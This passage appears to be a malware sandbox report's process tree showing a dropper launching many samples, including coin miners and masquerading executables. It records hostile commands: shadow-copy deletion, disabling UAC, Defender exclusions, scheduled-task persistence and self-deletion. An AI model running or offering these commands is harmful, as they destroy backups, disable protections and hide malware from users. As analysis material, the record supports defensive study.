      "C:\Windows\system32\wermgr.exe" "-outproc" "0" "7864" "1632" "1568" "1628" "0" "0" "1636" "0" "0" "0" "0" "0"
      4⤵
      PID:6068
- C:\Users\Admin\AppData\Local\Temp\a\setup (2).exe
  "C:\Users\Admin\AppData\Local\Temp\a\setup (2).exe"
  2⤵
  PID:1660
- C:\Users\Admin\AppData\Local\Temp\a\build (2).exe
  "C:\Users\Admin\AppData\Local\Temp\a\build (2).exe"
  2⤵
  PID:6416
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\AppData\Local\Temp\a\build (2).exe
    3⤵
    PID:7564
  - - C:\Windows\system32\choice.exe
      choice /C Y /N /D Y /T 0
      4⤵
      PID:7868
- C:\Users\Admin\AppData\Local\Temp\a\ppls25 (2).exe
  "C:\Users\Admin\AppData\Local\Temp\a\ppls25 (2).exe"
  2⤵
  PID:7072
- C:\Users\Admin\AppData\Local\Temp\a\toolspub1.exe
  "C:\Users\Admin\AppData\Local\Temp\a\toolspub1.exe"
  2⤵
  PID:4228
- - C:\Users\Admin\AppData\Local\Temp\a\toolspub1.exe
    "C:\Users\Admin\AppData\Local\Temp\a\toolspub1.exe"
    3⤵
    PID:5256
- C:\Users\Admin\AppData\Local\Temp\a\xmine.exe
  "C:\Users\Admin\AppData\Local\Temp\a\xmine.exe"
  2⤵
  PID:6264
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
    3⤵
    PID:7284
- - C:\Users\Admin\AppData\Local\Temp\a\xmine.exe
    C:\Users\Admin\AppData\Local\Temp\a\xmine.exe
    3⤵
    PID:5400
- C:\Users\Admin\AppData\Local\Temp\a\WSearch136Estcott.exe
  "C:\Users\Admin\AppData\Local\Temp\a\WSearch136Estcott.exe"
  2⤵
  PID:1520
- - C:\Program Files (x86)\LuckyWheel\LuckyWheel.exe
    "C:\Program Files (x86)\LuckyWheel\LuckyWheel.exe"
    3⤵
    PID:8040
  - - C:\Program Files (x86)\LuckyWheel\gTrend60.exe
      "C:\Program Files (x86)\LuckyWheel\gTrend60.exe"
      4⤵
      PID:6068
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6068 -s 708
        5⤵
        Program crash
        
        PID:5912
- - C:\Program Files (x86)\LuckyWheel\WindowsServices.exe
    "C:\Program Files (x86)\LuckyWheel\WindowsServices.exe"
    3⤵
    PID:6372
- C:\Users\Admin\AppData\Local\Temp\a\miner.exe
  "C:\Users\Admin\AppData\Local\Temp\a\miner.exe"
  2⤵
  PID:520
- C:\Users\Admin\AppData\Local\Temp\a\KK.exe
  "C:\Users\Admin\AppData\Local\Temp\a\KK.exe"
  2⤵
  PID:2560
- C:\Users\Admin\AppData\Local\Temp\a\360.exe
  "C:\Users\Admin\AppData\Local\Temp\a\360.exe"
  2⤵
  PID:5960
- C:\Users\Admin\AppData\Local\Temp\a\word.exe
  "C:\Users\Admin\AppData\Local\Temp\a\word.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4420
- C:\Users\Admin\AppData\Local\Temp\a\malwr.exe
  "C:\Users\Admin\AppData\Local\Temp\a\malwr.exe"
  2⤵
  PID:6624
- - C:\Windows\system32\cmd.exe
    cmd.exe /C vssadmin.exe delete shadows /all /quiet
    3⤵
    PID:2676
- C:\Users\Admin\AppData\Local\Temp\a\toolspub2.exe
  "C:\Users\Admin\AppData\Local\Temp\a\toolspub2.exe"
  2⤵
  PID:7288
- - C:\Users\Admin\AppData\Local\Temp\a\toolspub2.exe
    "C:\Users\Admin\AppData\Local\Temp\a\toolspub2.exe"
    3⤵
    PID:5484
- C:\Users\Admin\AppData\Local\Temp\a\Had (2).exe
  "C:\Users\Admin\AppData\Local\Temp\a\Had (2).exe"
  2⤵
  PID:1768
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CasPol.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CasPol.exe"
    3⤵
    PID:6292
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe"
    3⤵
    PID:8104
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe"
    3⤵
    PID:6588
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ServiceModelReg.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ServiceModelReg.exe"
    3⤵
    PID:7944
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regsql.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regsql.exe"
    3⤵
    PID:7340
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentask.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentask.exe"
    3⤵
    PID:6880
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5788
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
    3⤵
    PID:6928
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe"
    3⤵
    PID:4848
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe"
    3⤵
    PID:60
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\WsatConfig.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\WsatConfig.exe"
    3⤵
    PID:7716
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe"
    3⤵
    PID:320
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"
    3⤵
    PID:2216
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe"
    3⤵
    PID:7244
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regbrowsers.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regbrowsers.exe"
    3⤵
    PID:5796
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe"
    3⤵
    PID:7204
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe"
    3⤵
    PID:4896
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe"
    3⤵
    PID:7320
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
    3⤵
    PID:1900
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe"
    3⤵
    PID:64
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe"
    3⤵
    PID:4104
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ComSvcConfig.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ComSvcConfig.exe"
    3⤵
    PID:5804
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe"
    3⤵
    PID:3544
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\DataSvcUtil.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\DataSvcUtil.exe"
    3⤵
    PID:5220
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe"
    3⤵
    PID:5696
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\EdmGen.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\EdmGen.exe"
    3⤵
    PID:7960
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe"
    3⤵
    PID:7056
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe"
    3⤵
    PID:1124
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe"
    3⤵
    PID:1524
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe"
    3⤵
    PID:7364
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"
    3⤵
    PID:6796
- C:\Users\Admin\AppData\Local\Temp\a\tmglobalzx.exe
  "C:\Users\Admin\AppData\Local\Temp\a\tmglobalzx.exe"
  2⤵
  PID:6284
- - C:\Users\Admin\AppData\Local\Temp\a\tmglobalzx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\tmglobalzx.exe"
    3⤵
    PID:5724
- C:\Users\Admin\AppData\Local\Temp\a\secrexzx.exe
  "C:\Users\Admin\AppData\Local\Temp\a\secrexzx.exe"
  2⤵
  PID:6196
- - C:\Users\Admin\AppData\Local\Temp\a\secrexzx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\secrexzx.exe"
    3⤵
    PID:6556
- C:\Users\Admin\AppData\Local\Temp\a\xmrig.exe
  "C:\Users\Admin\AppData\Local\Temp\a\xmrig.exe"
  2⤵
  PID:4748
- C:\Users\Admin\AppData\Local\Temp\a\pablozx.exe
  "C:\Users\Admin\AppData\Local\Temp\a\pablozx.exe"
  2⤵
  PID:7048
- - C:\Users\Admin\AppData\Local\Temp\a\pablozx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\pablozx.exe"
    3⤵
    PID:3440
- - C:\Users\Admin\AppData\Local\Temp\a\pablozx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\pablozx.exe"
    3⤵
    PID:4376
- C:\Users\Admin\AppData\Local\Temp\a\nkpoliizx.exe
  "C:\Users\Admin\AppData\Local\Temp\a\nkpoliizx.exe"
  2⤵
  PID:5008
- - C:\Users\Admin\AppData\Local\Temp\a\nkpoliizx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\nkpoliizx.exe"
    3⤵
    PID:7992
- C:\Users\Admin\AppData\Local\Temp\a\360TS_Setup_Mini_WW.Datacash.CPI202304_6.6.0.1054.exe
  "C:\Users\Admin\AppData\Local\Temp\a\360TS_Setup_Mini_WW.Datacash.CPI202304_6.6.0.1054.exe"
  2⤵
  PID:6204
- C:\Users\Admin\AppData\Local\Temp\a\workfinezx.exe
  "C:\Users\Admin\AppData\Local\Temp\a\workfinezx.exe"
  2⤵
  PID:5848
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IOktOFpaLKGPz" /XML "C:\Users\Admin\AppData\Local\Temp\tmpE775.tmp"
    3⤵
    - Creates scheduled task(s)
    PID:5128
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\IOktOFpaLKGPz.exe"
    3⤵
    PID:5844
- - C:\Users\Admin\AppData\Local\Temp\a\workfinezx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\workfinezx.exe"
    3⤵
    PID:2528
- C:\Users\Admin\AppData\Local\Temp\a\thirdbobbyzx.exe
  "C:\Users\Admin\AppData\Local\Temp\a\thirdbobbyzx.exe"
  2⤵
  PID:1196
- - C:\Users\Admin\AppData\Local\Temp\pcxwpvbryx.exe
    "C:\Users\Admin\AppData\Local\Temp\pcxwpvbryx.exe" C:\Users\Admin\AppData\Local\Temp\qjvqkpi.odu
    3⤵
    PID:5904
- C:\Users\Admin\AppData\Local\Temp\a\vbc (8).exe
  "C:\Users\Admin\AppData\Local\Temp\a\vbc (8).exe"
  2⤵
  PID:3864
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    3⤵
    PID:7944
  - - C:\Windows\SysWOW64\help.exe
      "C:\Windows\SysWOW64\help.exe"
      4⤵
      PID:6944
- C:\Users\Admin\AppData\Local\Temp\a\dan.exe
  "C:\Users\Admin\AppData\Local\Temp\a\dan.exe"
  2⤵
  PID:7548
- C:\Users\Admin\AppData\Local\Temp\a\vbc (9).exe
  "C:\Users\Admin\AppData\Local\Temp\a\vbc (9).exe"
  2⤵
  PID:7924
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    3⤵
    PID:4092
- C:\Users\Admin\AppData\Local\Temp\a\services.exe
  "C:\Users\Admin\AppData\Local\Temp\a\services.exe"
  2⤵
  PID:4028
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
    3⤵
    PID:7856
- C:\Users\Admin\AppData\Local\Temp\a\install.exe
  "C:\Users\Admin\AppData\Local\Temp\a\install.exe"
  2⤵
  PID:164
- - C:\Users\Admin\AppData\Local\Temp\a\install.exe
    C:\Users\Admin\AppData\Local\Temp\a\install.exe
    3⤵
    PID:6456
- C:\Users\Admin\AppData\Local\Temp\a\Ruzvelt.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Ruzvelt.exe"
  2⤵
  PID:5204
- C:\Users\Admin\AppData\Local\Temp\a\quoteezx.exe
  "C:\Users\Admin\AppData\Local\Temp\a\quoteezx.exe"
  2⤵
  PID:5360
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMwAwAA==
    3⤵
    PID:7488
- - C:\Users\Admin\AppData\Local\Temp\a\quoteezx.exe
    C:\Users\Admin\AppData\Local\Temp\a\quoteezx.exe
    3⤵
    PID:3984
  - - C:\Windows\SysWOW64\cmd.exe
      /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
      4⤵
      PID:7572
  - - C:\Users\Admin\AppData\Roaming\Explorers\Explorers.exe
      "C:\Users\Admin\AppData\Roaming\Explorers\Explorers.exe"
      4⤵
      PID:4640
- - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\Scnolxsyquote .pdf"
    3⤵
    PID:5948
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
      4⤵
      PID:7036
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=4546B3DA37B1B22D846D3A0BECF68CB5 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=4546B3DA37B1B22D846D3A0BECF68CB5 --renderer-client-id=2 --mojo-platform-channel-handle=1480 --allow-no-sandbox-job /prefetch:1
        5⤵
        
        PID:5992
- C:\Users\Admin\AppData\Local\Temp\a\govonorzx.exe
  "C:\Users\Admin\AppData\Local\Temp\a\govonorzx.exe"
  2⤵
  PID:4864
- - C:\Users\Admin\AppData\Local\Temp\a\govonorzx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\govonorzx.exe"
    3⤵
    PID:5720
- C:\Users\Admin\AppData\Local\Temp\a\360TS_Setup_Mini_WW.Marketator.CPI20230401_6.6.0.1054.exe
  "C:\Users\Admin\AppData\Local\Temp\a\360TS_Setup_Mini_WW.Marketator.CPI20230401_6.6.0.1054.exe"
  2⤵
  PID:5828
- C:\Users\Admin\AppData\Local\Temp\a\shedume2.1.exe
  "C:\Users\Admin\AppData\Local\Temp\a\shedume2.1.exe"
  2⤵
  PID:7176
- - C:\Users\Admin\AppData\Local\Temp\onzqy.exe
    "C:\Users\Admin\AppData\Local\Temp\onzqy.exe" C:\Users\Admin\AppData\Local\Temp\tzehxhtbqdr.f
    3⤵
    PID:6184
  - - C:\Users\Admin\AppData\Local\Temp\onzqy.exe
      "C:\Users\Admin\AppData\Local\Temp\onzqy.exe"
      4⤵
      PID:6388
- C:\Users\Admin\AppData\Local\Temp\a\MicOSOFTSearchProtocolHosb66.exe
  "C:\Users\Admin\AppData\Local\Temp\a\MicOSOFTSearchProtocolHosb66.exe"
  2⤵
  PID:6056
- - \??\c:\dan.exe
    c:\dan.exe
    3⤵
    PID:6908
- C:\Users\Admin\AppData\Local\Temp\a\svchost.exe
  "C:\Users\Admin\AppData\Local\Temp\a\svchost.exe"
  2⤵
  PID:6752
- - C:\Users\Admin\AppData\Local\Temp\a\svchost.exe
    "C:\Users\Admin\AppData\Local\Temp\a\svchost.exe"
    3⤵
    PID:676
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C mkdir "C:\Users\Admin\AppData\Roaming\explorer"
    3⤵
    PID:8100
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\explorer\explorer.exe'" /f
    3⤵
    PID:4596
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\explorer\explorer.exe'" /f
      4⤵
      Creates scheduled task(s)
      PID:2136
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C copy "C:\Users\Admin\AppData\Local\Temp\a\svchost.exe" "C:\Users\Admin\AppData\Roaming\explorer\explorer.exe"
    3⤵
    PID:5788
- C:\Users\Admin\AppData\Local\Temp\a\vbc (10).exe
  "C:\Users\Admin\AppData\Local\Temp\a\vbc (10).exe"
  2⤵
  PID:6820
- C:\Users\Admin\AppData\Local\Temp\a\vbc (11).exe
  "C:\Users\Admin\AppData\Local\Temp\a\vbc (11).exe"
  2⤵
  PID:7028
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    3⤵
    PID:6116
- C:\Users\Admin\AppData\Local\Temp\a\vbc (12).exe
  "C:\Users\Admin\AppData\Local\Temp\a\vbc (12).exe"
  2⤵
  PID:1268
- C:\Users\Admin\AppData\Local\Temp\a\networksec.exe
  "C:\Users\Admin\AppData\Local\Temp\a\networksec.exe"
  2⤵
  PID:6392
- C:\Users\Admin\AppData\Local\Temp\a\Ruzvelt (2).exe
  "C:\Users\Admin\AppData\Local\Temp\a\Ruzvelt (2).exe"
  2⤵
  PID:5736
- C:\Users\Admin\AppData\Local\Temp\a\buildz.exe
  "C:\Users\Admin\AppData\Local\Temp\a\buildz.exe"
  2⤵
  PID:3992
- - C:\Users\Admin\AppData\Local\Temp\a\buildz.exe
    "C:\Users\Admin\AppData\Local\Temp\a\buildz.exe"
    3⤵
    PID:7860
  - - C:\Users\Admin\AppData\Local\Temp\a\buildz.exe
      "C:\Users\Admin\AppData\Local\Temp\a\buildz.exe" --Admin IsNotAutoStart IsNotTask
      4⤵
      PID:6052
    - - C:\Users\Admin\AppData\Local\Temp\a\buildz.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a\buildz.exe" --Admin IsNotAutoStart IsNotTask
        5⤵
        
        PID:7080
- C:\Users\Admin\AppData\Local\Temp\a\secatlaszx.exe
  "C:\Users\Admin\AppData\Local\Temp\a\secatlaszx.exe"
  2⤵
  PID:7868
- - C:\Users\Admin\AppData\Local\Temp\a\secatlaszx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\secatlaszx.exe"
    3⤵
    PID:4596
- - C:\Users\Admin\AppData\Local\Temp\a\secatlaszx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\secatlaszx.exe"
    3⤵
    PID:5244
- - C:\Users\Admin\AppData\Local\Temp\a\secatlaszx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\secatlaszx.exe"
    3⤵
    PID:4328
- C:\Users\Admin\AppData\Local\Temp\a\kimzx.exe
  "C:\Users\Admin\AppData\Local\Temp\a\kimzx.exe"
  2⤵
  PID:7336
- - C:\Users\Admin\AppData\Local\Temp\a\kimzx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\kimzx.exe"
    3⤵
    PID:7532
- C:\Users\Admin\AppData\Local\Temp\a\nellyzx.exe
  "C:\Users\Admin\AppData\Local\Temp\a\nellyzx.exe"
  2⤵
  PID:6832
- - C:\Users\Admin\AppData\Local\Temp\a\nellyzx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\nellyzx.exe"
    3⤵
    PID:6088
- - C:\Users\Admin\AppData\Local\Temp\a\nellyzx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\nellyzx.exe"
    3⤵
    PID:3168
- C:\Users\Admin\AppData\Local\Temp\a\offbinzx.exe
  "C:\Users\Admin\AppData\Local\Temp\a\offbinzx.exe"
  2⤵
  PID:7664
- - C:\Users\Admin\AppData\Local\Temp\a\offbinzx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\offbinzx.exe"
    3⤵
    PID:2820
- - C:\Users\Admin\AppData\Local\Temp\a\offbinzx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\offbinzx.exe"
    3⤵
    PID:2852
- - C:\Users\Admin\AppData\Local\Temp\a\offbinzx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\offbinzx.exe"
    3⤵
    PID:5796
- - C:\Users\Admin\AppData\Local\Temp\a\offbinzx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\offbinzx.exe"
    3⤵
    PID:4032
- C:\Users\Admin\AppData\Local\Temp\a\nnannazx.exe
  "C:\Users\Admin\AppData\Local\Temp\a\nnannazx.exe"
  2⤵
  PID:4044
- - C:\Users\Admin\AppData\Local\Temp\a\nnannazx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\nnannazx.exe"
    3⤵
    PID:1392
- - C:\Users\Admin\AppData\Local\Temp\a\nnannazx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\nnannazx.exe"
    3⤵
    PID:5944
- - C:\Users\Admin\AppData\Local\Temp\a\nnannazx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\nnannazx.exe"
    3⤵
    PID:6956
- C:\Users\Admin\AppData\Local\Temp\a\stevezx.exe
  "C:\Users\Admin\AppData\Local\Temp\a\stevezx.exe"
  2⤵
  PID:5928
- - C:\Users\Admin\AppData\Local\Temp\a\stevezx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\stevezx.exe"
    3⤵
    PID:6768
- C:\Users\Admin\AppData\Local\Temp\a\Uomwqqq.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Uomwqqq.exe"
  2⤵
  PID:5552
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
    3⤵
    PID:6228
- C:\Users\Admin\AppData\Local\Temp\a\kmkzx.exe
  "C:\Users\Admin\AppData\Local\Temp\a\kmkzx.exe"
  2⤵
  PID:5196
- - C:\Users\Admin\AppData\Local\Temp\a\kmkzx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\kmkzx.exe"
    3⤵
    PID:4348
- C:\Users\Admin\AppData\Local\Temp\a\johnzx.exe
  "C:\Users\Admin\AppData\Local\Temp\a\johnzx.exe"
  2⤵
  PID:5588
- - C:\Users\Admin\AppData\Local\Temp\a\johnzx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\johnzx.exe"
    3⤵
    PID:7840
- C:\Users\Admin\AppData\Local\Temp\a\pumkinzx.exe
  "C:\Users\Admin\AppData\Local\Temp\a\pumkinzx.exe"
  2⤵
  PID:7504
- - C:\Users\Admin\AppData\Local\Temp\a\pumkinzx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\pumkinzx.exe"
    3⤵
    PID:8184
- C:\Users\Admin\AppData\Local\Temp\a\NewM.exe
  "C:\Users\Admin\AppData\Local\Temp\a\NewM.exe"
  2⤵
  PID:3544
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $file='C:\Users\Admin\AppData\Local\Temp\a\NewM.exe';for($i=1;$i -le 600 -and (Test-Path $file -PathType leaf);$i++){Remove-Item $file;Start-Sleep -m 100}
    3⤵
    PID:1060
- C:\Users\Admin\AppData\Local\Temp\a\donpyzx.exe
  "C:\Users\Admin\AppData\Local\Temp\a\donpyzx.exe"
  2⤵
  PID:6948
- - C:\Users\Admin\AppData\Local\Temp\a\donpyzx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\donpyzx.exe"
    3⤵
    PID:1552
- - C:\Users\Admin\AppData\Local\Temp\a\donpyzx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\donpyzx.exe"
    3⤵
    PID:5372
- C:\Users\Admin\AppData\Local\Temp\a\ts.exe
  "C:\Users\Admin\AppData\Local\Temp\a\ts.exe"
  2⤵
  PID:7180
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 7180 -s 616
    3⤵
    PID:7200
- C:\Users\Admin\AppData\Local\Temp\a\My2.exe
  "C:\Users\Admin\AppData\Local\Temp\a\My2.exe"
  2⤵
  PID:7104
- C:\Users\Admin\AppData\Local\Temp\a\secbobbyzx.exe
  "C:\Users\Admin\AppData\Local\Temp\a\secbobbyzx.exe"
  2⤵
